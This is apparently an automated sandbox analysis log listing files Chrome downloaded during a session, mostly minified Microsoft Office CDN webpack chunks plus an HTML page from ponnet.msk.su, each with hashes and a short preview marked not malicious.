                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[14096],{702851:(e,t,n)=>{var a;n.d(t,{b:()=>i}),function(e){e[e.None=0]="None",e[e.ExternalVideoSharing=1]="ExternalVideoSharing",e[e.PlaybackTranscriptTranslation=2]="PlaybackTranscriptTranslation",e[e.MediaAnalytics=4]="MediaAnalytics",e[e.HighResolutionPlayback=8]="HighResolutionPlayback"}(a||(a={}));var i="OnePlayer.lastWatchedPositionData"}.,796774:(e,t,n)=>{n.d(t,{b:()=>i});var a=n(295610),i={name:"AboutVideoInline",version:n(46227)._,phasesToInit:["BeforeUi"],getPluginInstanceFactory:function(e){return function(t){return(0,a.__awaiter)(void 0,void 0,void 0,function(){return(0,a.__generator)(this,function(a){switch(a.label){case 0:return[4,t("LoadPluginModule",function(){return Promise.all([n.e(33447),n.e(30670),n.e(86806),n.e(15842),n.e(81240),n.e(86892)]).then(n.bind(n,587443))})];case 1:return[2,a.sent().createPluginInstance(e)]}})})}}}}.,416974:(e,t,n)=>{n.d(t,{q:()=>i});var a=n(29
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (6134)
                                                  Category:dropped
                                                  Size (bytes):7361
                                                  Entropy (8bit):5.074516579864194
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B974DE90C8B5513499F861F2F602B4E8
                                                  SHA1:3F0B15BC3AF1B7CB947D6ED73AD062D50E2C1A3A
                                                  SHA-256:D089035E0600C589E96E1E0DE5946E3F28532FB02C57C2CB8D92FA43D18932E7
                                                  SHA-512:377942B70DB96CE39AC7EEBE0A2FD00F314782CF481FEBC985107FC677DEF41E7836369F0CA70FE2C85415AE367B4F011ECD6354359803F829181EFA8D6AE17F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[12],{8044:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return s},c:function(){return c},d:function(){return r},e:function(){return o},f:function(){return d},g:function(){return l},h:function(){return u},i:function(){return f},j:function(){return p},k:function(){return m},l:function(){return _},m:function(){return h},n:function(){return b},o:function(){return g},p:function(){return v},q:function(){return y},r:function(){return S},s:function(){return x},t:function(){return C},u:function(){return D},v:function(){return I},w:function(){return E},x:function(){return A},y:function(){return O},z:function(){return w}});var a=n(5901);const i=(0,a.a)("ChatSparkle20Regular","20",["m14.88.28.35 1.07a2.2 2.2 0 0 0 1.4 1.4l1.07.35h.02a.42.42 0 0 1 0 .8l-1.07.35a2.2 2.2 0 0 0-1.4 1.4l-.35 1.07a.42.42 0 0 1-.8 0l-.35-1.07a2.23 2.23 0 0 0-1.4-1.4l-1.07-.35a.42.42 0 0 1 0-.8l1.07-.35a2.2 2.2 0 0 0 1.38-1.4l.35-1.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4142)
                                                  Category:downloaded
                                                  Size (bytes):9803
                                                  Entropy (8bit):5.201882695658141
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:29A1033FBEF8490B680AF5A044B70D1D
                                                  SHA1:CD1D88026A834530D2181865BD02D21BCFE9194B
                                                  SHA-256:08CEEF1E37757A038CAE62D3F2483A4C238A3F491EF16A76C8EF0F96D424E630
                                                  SHA-512:74EC5FD0C8163FFA0A38A53F9868BF6254C7788CCABC835DCA28F5B27A485B9F36DB5816C78E026FD69E3D1053813A766DF60189C2194682F168304F23BA0CC5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/343.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[343,2037],{2488:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19]="malw
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10544)
                                                  Category:downloaded
                                                  Size (bytes):54793
                                                  Entropy (8bit):5.4025329677962315
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0A5A0FB7F6749569B5337A4D15984BD5
                                                  SHA1:D37539DAB6FA1EF0BDD74F518E929D0097719661
                                                  SHA-256:3A16D9A4AA481CB84D89EACD496575A9E36D96D5E9537B5603A035F2CD302D7A
                                                  SHA-512:CDBDBAD186195245D52F27D4F96943076C5695DF7773BB3B2757D1D53AF9C0D8024C22654CF2B48263DDB3A13D724FB78C0CA4CB6F71BBD1DA241743C60209A0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/236.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[236,1044,101],{2640:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return o}});var a=n("react-lib");const i=a.createContext(void 0),r=i.Provider,o=()=>a.useContext(i)}.,2639:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return i}});var a=n(2640);function i(e,t){return r((0,a.b)(),e,t)}function r(e,t,n){if(!e)return t;t={...t};const{generatedControlId:a,hintId:i,labelFor:r,labelId:o,required:s,validationMessageId:c,validationState:d}=e;var l,u,f,p,m,_,h,b,g,v,y,S;return a&&(null!==(u=(l=t).id)&&void 0!==u||(l.id=a)),!o||(null==n?void 0:n.supportsLabelFor)&&r===t.id||null!==(p=(f=t)["aria-labelledby"])&&void 0!==p||(f["aria-labelledby"]=o),(c||i)&&(t["aria-describedby"]=[c,i,null==t?void 0:t["aria-describedby"]].filter(Boolean).join(" ")),"error"===d&&(null!==(_=(m=t)["aria-invalid"])&&void 0!==_||(m["aria-invalid"]=!0)),s&&((null==n?void 0:n.supportsRequired)?null!==(b=(h=t).required)&
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):161
                                                  Entropy (8bit):5.214926295422427
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5526FF94DBC097263217FB9B236ACBE8
                                                  SHA1:7C10D93AF603F4D098F70B8E41653C6E85638BF5
                                                  SHA-256:70810AB8D49DD7DD1872C1B630BFFABFA89FC46285B43AABD5FA5E76D0513541
                                                  SHA-512:DEE0ABFE71964BF4C166E04866AF8BEA2596C7AB3D4BC740F972C1A0029DF0956E7F0331BED4B75C4673FC201CE98929CFD86AEC4A7F2D450243F2BDA1B632BA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1652],{5056:function(e,t,n){n.r(t),(0,n("fui.util_369").Bv)(JSON.parse("[]"))}.}]);
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (849)
                                                  Category:downloaded
                                                  Size (bytes):854
                                                  Entropy (8bit):5.068388356285687
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8E0A715FDC8A2EC02408D68AAE01DF99
                                                  SHA1:453B75766236EA4C59B7672FC89DF1A18FCA2F20
                                                  SHA-256:EB2A68C140751172E4935E4EEA3859E919FF3B7B9997451652354AE1C8EB9336
                                                  SHA-512:30AE03535DE05C1BC14DBC6842748E9C8531062A1146782FF82BE9D6986477BC06BEA15F83E929FE8F7E02E3B4AE4D6A7540FD84D5EDE2D91A4FCD40BA361FAD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/16632.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[16632],{716632:(e,t,n)=>{n.d(t,{gKk:()=>s,gXG:()=>i,ksq:()=>r,nai:()=>o});var a=n(790599);const i=(0,a.k)("Checkmark12Filled","12",["M9.76 3.2c.3.29.32.76.04 1.06l-4.25 4.5a.75.75 0 0 1-1.08.02L2.22 6.53a.75.75 0 0 1 1.06-1.06l1.7 1.7L8.7 3.24a.75.75 0 0 1 1.06-.04Z"]),r=(0,a.k)("Checkmark16Filled","16",["M14.05 3.49c.28.3.27.77-.04 1.06l-7.93 7.47A.85.85 0 0 1 4.9 12L2.22 9.28a.75.75 0 1 1 1.06-1.06l2.24 2.27 7.47-7.04a.75.75 0 0 1 1.06.04Z"]),o=(0,a.k)("ChevronDown16Regular","16",["M3.15 5.65c.2-.2.5-.2.7 0L8 9.79l4.15-4.14a.5.5 0 0 1 .7.7l-4.5 4.5a.5.5 0 0 1-.7 0l-4.5-4.5a.5.5 0 0 1 0-.7Z"]),s=(0,a.k)("ChevronUp16Regular","16",["M3.15 10.35c.2.2.5.2.7 0L8 6.21l4.15 4.14a.5.5 0 0 0 .7-.7l-4.5-4.5a.5.5 0 0 0-.7 0l-4.5 4.5a.5.5 0 0 0 0 .7Z"])}.}]);
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):87
                                                  Entropy (8bit):4.674522374636856
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1629709B420FE5981924392917611397
                                                  SHA1:9925539FA01891AF3845AD86A3B0CA311A19AE4D
                                                  SHA-256:63386A3F971A5A0189426BC682D9954C68BEBAEA78124543541F81F70A05BDDC
                                                  SHA-512:7DA4ED173A42984C75B2A211CF4424AD3DA22E46281CDE7EFF1935DF5B1EE58EF3C3EF27F20DD61701394E74F2DAF19CA7A992A81201163A8E8C91E02528C014
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"errors":[{"message":"A query is required.","extensions":{"code":"EXECUTION_ERROR"}}]}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (20346)
                                                  Category:dropped
                                                  Size (bytes):29038
                                                  Entropy (8bit):5.2873644054832365
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:269D9B96D163B4772D2D51513D203FCF
                                                  SHA1:2199AD16016D1A935B237EE4039BC9E7AA3A5222
                                                  SHA-256:E88D0C03C2ECDF50F6CE477C1BE7CF769B85DE76AC8F1D1DA12356562DE6A8FF
                                                  SHA-512:94BCBEF77348B18840C16D447446F0EDDA5865EA270D2CBD1E908515AEB26AE6FD24BA937E840F021D838CDA716891202A6D31B9C1F136E375D9FC4AC1B47F39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[39,682,2037],{2488:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19]="m
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (8956)
                                                  Category:downloaded
                                                  Size (bytes):22231
                                                  Entropy (8bit):5.3084681408798895
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2F2AA59C24A9163656477FFE066C9EE2
                                                  SHA1:24D7F1A4DC4E7476A89ED93BE67CAD318A0C5D4B
                                                  SHA-256:5B3A2B514CA35CF9AF74599D09821838AC8CD6B250CF08D9424E137D62B21A6E
                                                  SHA-512:8EBD2A2775AFBE59053BC295FF8010944DB41A41CBEC9DE32248CDB0D8976F5A74559BF220BE7F56C3B2A95131C4496A06F7D0DDAED14DFF66817E3C1E865464
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/41.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[41],{4219:function(e,t,n){n.d(t,{a:function(){return u}});var a=n(20),i=n(7930),r=n("tslib_102"),o=n(61),s=n(58),c=n(3811),d=n(476),l=function(e){function t(){var n=e.call(this,t._Key,t._DataStoreCachingType)||this;if(n._MaxItems=200,n._Version=5,n._buffer=n.getValue(t._StorageKey),n._buffer&&n._buffer.version===n._Version&&n._buffer.lastCachePrune||n.initializeBuffer(),n._data={},Date.now()<n._buffer.lastCachePrune+6048e5)for(var a=0;a<n._buffer.dataArray.length;a++){var i=n._buffer.dataArray[a],r=n._getItemKey(i);n._data[r]=i}else n.initializeBuffer(),n.setValue(t._StorageKey,n._buffer);return n}return(0,r.XJ)(t,e),t.clear=function(){new o.a(t._Key,t._DataStoreCachingType).remove(t._StorageKey)},t.isCacheEntryFresh=function(e,t){return e.name===t.name&&e.email===t.email&&e.job===t.job&&e.office===t.office&&e.department===t.department&&e.phone===t.phone},t.prototype.setItem=function(e){var n=this._getItemKey
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):3932
                                                  Entropy (8bit):4.407440869337409
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6A61C2718DC082768015315F0F51B46B
                                                  SHA1:6F1BE2CC3B9C4DE7DD2DE760CAD2ADFC3F7BE190
                                                  SHA-256:EF8855E942EF9D05B325A5EA78E03BA193E524BA6DF38893C41FC0315AF215D2
                                                  SHA-512:F7EB78D7E192C123A8FF19D060FBD62ECFB9A447A4F6D52A5D6CB73A2668970CD9EE09352724A997EFA86A5BA9FB8A8996D1C97A3C0DDC1597E75D47339F1B19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_people.svg
                                                  Preview:<svg width="204" height="194" viewBox="0 0 204 194" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1003_115072)">..<path opacity="0.25" d="M162 159C207.024 130.667 207.5 109 179.5 78.0004C171.5 69.1432 188.5 36.9996 179.5 24.5001C169.595 10.743 146.5 1.5 113.5 24.5001C99.7171 34.1064 88 39.9662 70 33.9998C42.5 24.8844 32.5003 48.0004 32.5003 70.5004C32.5003 98.7743 28.0012 102 15.5006 125.5C3.00002 149 15.1691 170.444 41 179.5C72.2157 190.446 133.181 177.131 162 159Z" fill="#C3F3F5"/>..<path d="M137.4 100.9L44.4998 125.1C42.3998 125.7 40.1998 124.4 39.5998 122.2L25.4998 68.0002C24.8998 65.9002 26.1998 63.7002 28.3998 63.1002L121.3 38.9002C123.4 38.3002 125.6 39.6002 126.2 41.8002L140.3 96.0002C140.8 98.1002 139.5 100.3 137.4 100.9Z" fill="#C3F2F4"/>..<path d="M57.3004 85.0998C61.6634 85.0998 65.2004 81.5629 65.2004 77.1998C65.2004 72.8368 61.6634 69.2998 57.3004 69.2998C52.9373 69.2998 49.4004 72.8368 49.4004 77.1998C49.4004 81.5629 52.9373 85.0998 57.3004 85
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (7518)
                                                  Category:downloaded
                                                  Size (bytes):29604
                                                  Entropy (8bit):5.396180008958164
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2D678A6742D46DAE60EFE876BFCF748D
                                                  SHA1:D1FD2E7FF6F180DAB6BA91D6E958D0D1CCDDBD48
                                                  SHA-256:05C564AFFCE18B07B204308040D22FEF5FB4FCB6B1787598B4A37773A4BD9E06
                                                  SHA-512:EEDAD9251D952384DD73885900975FC196A541928CC6B4C473175509C0E2C0C37D612EF7F78C553B5C8BFBA1DE2A2693B12CA0E8CCB6FD2A0197E315289156F9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/69.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[69],{2596:function(e,t,n){n.d(t,{a:function(){return l}});var a=n("react-lib"),i=n(160),r=n(159),o=n("fui.core_351"),s=n(220);const c=(0,o.xbz)({base:{g2u3we:"fj3muxo",h3c5rm:["f1akhkt","f1lxtadh"],B9xav0g:"f1aperda",zhjwy3:["f1lxtadh","f1akhkt"],Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f1fabniw",B7ck84d:"f1ewtqcl",mc9l5x:"f14t3ns0"},bordered:{icvyot:"fzkkow9",vrafjx:["fcdblym","fjik90z"],oivjwe:"fg706s2",wvpqe5:["fjik90z","fcdblym"],B4j52fo:"f192inf7",Bekrc4i:["f5tn483","f1ojsxk5"],Bn0qgzm:"f1vxd6vx",ibv6hh:["f1ojsxk5","f5tn483"]},circular:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f44lkw9"},rounded:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"ft85np5"},square:{},shadow:{E5pizo:"f1whvlc6"},center:{st4lth:"f1plgu50",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},contain:{st4lth:"f1kle4es",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},default:{},cover:{st4lth:"f1ps3kmd",Ermj5k
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (10101)
                                                  Category:downloaded
                                                  Size (bytes):13115
                                                  Entropy (8bit):4.974648882071977
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EA2B56CEFCBB7E8E984C8D48F9E1E2F5
                                                  SHA1:3F291762F9358CEC15D5918455E5A12D5F4677FA
                                                  SHA-256:C4109D1E439EA517007F7C05475F6F2CB057649BF2BC2336C89DCA012504FCD4
                                                  SHA-512:EE77B876D6471CF2FA9B56F06CAE642F35E439528FF11959F78610B970699C7AE0B8146F31C8AB9251F7FCF135EF4F8C99FDABD7D38DA90F982FFEDCEC1AED04
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/38661.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[38661],{157285:(e,t,n)=>{n.d(t,{d:()=>o});var a=n(427445),i=n(639849);function r(e,t,n,a){void 0===a&&(a=!1);var r=0;if("string"==typeof e){var o=n.numberDigitSeperator||",",s=e.replace(new RegExp("\\".concat(o),"g"),"");r=Number(s)}else"number"==typeof e&&(r=e);return r<0&&!a&&(r=0),1===r?(0,i.U)(t.Singular,e.toString()):(0,i.U)(t.Plural,e.toString())}function o(e,t){if(!e)return"";var n=[t.Second,t.Minute,t.Hour,t.Day,t.Month,t.Year],i=e.split(t.Separator);if(i.some(function(e){return isNaN(+e)}))return"";for(var o="",s=0,c=i.length-1;s<i.length&&c>=0;s++,c--){var d=parseInt(i[s],10);(0===s||d>0)&&(o+="".concat(d," ").concat(r(d,n[c],(0,a.u)())))," "!==o.charAt(o.length-1)&&(o+=" ")}return o.trim()}}.,427445:(e,t,n)=>{n.d(t,{u:()=>o});var a={"af-za":{d:"YYYY-MM-DD",ns:"."},"am-et":{d:"DD/MM/YYYY"},"ar-ae":{d:"DD/MM/YYYY",t:"hh:mm tt"},"ar-bh":{d:"DD/MM/YYYY",t:"hh:mm tt"},"ar-dz":{d:"DD-M
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (491), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):6685
                                                  Entropy (8bit):4.730205947101217
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:54FCDCB22DB128FE64120D67C330CB5E
                                                  SHA1:27DF1279FACE164EB03D2A2D774622D15796A176
                                                  SHA-256:BA6506D6C451AD76CCC6FF3EE116FC3C2F561AC10DC07C41A777996A1B63DB5A
                                                  SHA-512:3FC6A5DB9C2D1391A8077275032E44DD5F220359877F0433A3BC75A1377603A27D63FB4A14706E30BE2A07470FAC210733372EBB44C51421D3266142B704490D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Luxury Sports Car Collectors - ponnet.msk.su</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> ..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://ponnet.msk.su/#">.. <i class="fas fa-car"></i> Luxury Sports Car Collectors .. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">.. <span class="navbar-tog
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (45743)
                                                  Category:downloaded
                                                  Size (bytes):47183
                                                  Entropy (8bit):6.172699944092019
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:16015F2621311CAA7D4F2DE1C2DC38B7
                                                  SHA1:084423B41D8FDFBE58C75B08D29C3D5C445CB634
                                                  SHA-256:6CCC67255731AF9712C004C40816C2FFAC1455D5B377FCBB9DF591F42A95BD83
                                                  SHA-512:F6C994AA4B7DB5E33924D042DAF805647CCEAB18F20C57261AA706089671BA9A2585A7BB1122F4FA2FFF9D5124B5FC63D5D7A14305F27BE401086FE38DC41750
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/34876.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[34876],{444829:(e,t,n)=>{n.d(t,{S:()=>c});var a=n(295610),i=n(408156),r=n.n(i),o=n(538054),s=n(800596),c=function(e){function t(){var t=null!==e&&e.apply(this,arguments)||this;return t.state={},t}return(0,a.__extends)(t,e),t.prototype.render=function(){return void 0!==this.state.failure&&void 0!==this.props.fallback?this.props.fallback(this.state.failure):this.props.children},t.prototype.componentDidCatch=function(e,t,n){void 0===n&&(n=!0);var a=(0,o.E0)(e);try{this.props.onCatch&&this.props.onCatch({error:a,info:t})}catch(e){n&&this.componentDidCatch(new s.d(a,(0,o.E0)(e)),t,!1)}finally{n&&void 0===this.state.failure&&this.setState({failure:{error:a,info:t}})}},t}(r().Component)}.,800596:(e,t,n)=>{n.d(t,{d:()=>i});var a=n(295610),i=function(e){function t(n,a){var i=e.call(this,a.message)||this;return i.originalError=n,i.handlingError=a,i.stack=a.stack,void 0!==typeof Object.setPrototypeOf&&
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5383)
                                                  Category:downloaded
                                                  Size (bytes):8264
                                                  Entropy (8bit):5.41817157669228
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:53361FFAC291C133BF2E5D3E1D10736C
                                                  SHA1:2BAF535652241D644B64BD92B15EC2105E918A7D
                                                  SHA-256:778E80888762C38C0EB9AC7CCF59C810345859AA294E8A63DEA0A5DD07167A88
                                                  SHA-512:A6F2A272BE7DD7A88B1CF7AC3CC70C3CB288F474F761AAED5BD186177E59E6370D904377F7873269542F8F01DD2470DFCC8734E79519B7B27FE9440547474900
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/98455.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[98455],{598356:(e,t,n)=>{n.d(t,{L:()=>l});var a=n(295610),i=n(408156),r=n(887602),o=n(499499),s=n(849424),c=n(568594),d=n(160258);function l(e,t){void 0===t&&(t={});var n=t.factoryOptions,l=(void 0===n?{}:n).defaultProp,f=function(n){var c,d,l,f,p=(c=t.displayName,d=i.useContext(o.i),l=t.fields,f=["theme","styles","tokens"],s.X.getSettings(l||f,c,d.customizations)),m=t.state;m&&(n=(0,a.__assign)((0,a.__assign)({},n),m(n)));var _=n.theme||p.theme,h=u(n,_,t.tokens,p.tokens,n.tokens),b=function(e,t,n){for(var a=[],i=3;i<arguments.length;i++)a[i-3]=arguments[i];return r.L$.apply(void 0,a.map(function(a){return"function"==typeof a?a(e,t,n):a}))}(n,_,h,t.styles,p.styles,n.styles),g=(0,a.__assign)((0,a.__assign)({},n),{styles:b,tokens:h,_defaultStyles:b,theme:_});return e(g)};return f.displayName=t.displayName||e.name,l&&(f.create=(0,c.gw)(f,{defaultProp:l})),(0,d.f)(f,t.statics),f}function u(e,t){
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):115662
                                                  Entropy (8bit):5.431183121052163
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C85C3B22AAA4AA31B45A58893509FCB
                                                  SHA1:99508D796569DD4EE6867986F0DA00E49CC787F4
                                                  SHA-256:24FAF56B100CA33B3327841210A1835814D458DBEB39EF70CFFCADEFC7167BD1
                                                  SHA-512:C52C69E8F508E81322AB188FAAE8E991427158C028F10AF9DBC57B37982FBAC10C00B4E2633D27E21F994BE196263A1537B6909633D8A00670D0FBEA78B7D5DD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.components.migration.shims/fui.lcoms-ed2f180e.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcoms"],{"fui.lcoms_396":(e,t,n)=>{n.d(t,{wXy:()=>He,znC:()=>br,l68:()=>ie,Eq:()=>Te,YJx:()=>gr,A4s:()=>Ve,GH:()=>Cr,jLO:()=>at,i7k:()=>Or,wpb:()=>kt,LTg:()=>yr,BFZ:()=>Et,fvf:()=>Lt,HxW:()=>At,cDP:()=>wr,Utt:()=>vr,gZ2:()=>St,xuF:()=>Mt,KIQ:()=>Sr,l8P:()=>Vt,O1q:()=>Er,k4K:()=>Gt,DMw:()=>Dr,aeE:()=>cn,GDm:()=>Ar,F5G:()=>Qt,TgE:()=>_r,hEd:()=>Xr,QMi:()=>Ht,v$$:()=>lr,Ebc:()=>dn,TDY:()=>Ir,wiT:()=>vn,FAj:()=>Lr,s7Y:()=>io,_ot:()=>it,kKQ:()=>rt,OUF:()=>On,ji_:()=>kr,AI1:()=>Pn,PWj:()=>Mr,mzU:()=>zt,yru:()=>Qn,zA1:()=>Pr,aAZ:()=>$n,WIS:()=>Ur,rwx:()=>ra,nEE:()=>Tr,WwA:()=>Ut,BDu:()=>oa,nUB:()=>xr,wrB:()=>ua,EKs:()=>Fr,qaT:()=>Ua,dsI:()=>Rr,b2k:()=>Na,w_F:()=>Hr,cdL:()=>ma,lq8:()=>xa,Jml:()=>La,ELx:()=>Ka,XMb:()=>Nr,npR:()=>ti,ifj:()=>Br,kMU:()=>di,UfR:()=>jr,sIS:()=>yi,gsg:()=>zr,SFc:()=>Oi,nss:()=>Vr,kfi:()=>Ti,qCI:()=>Gr,eDP:()=>Hi,RUR:()=>Kr,kTb:()=>Ki,VGv:()=>Wr,vMK:()=>dr,Z4o:()=>Qr,NCE:()=>sr,Z1F:()=>
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3109)
                                                  Category:downloaded
                                                  Size (bytes):4724
                                                  Entropy (8bit):5.334939570104256
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9E99094BE2C93F340A70DAD0DE9B5CE2
                                                  SHA1:4E455466B0C2D411D50EE528E519109794137139
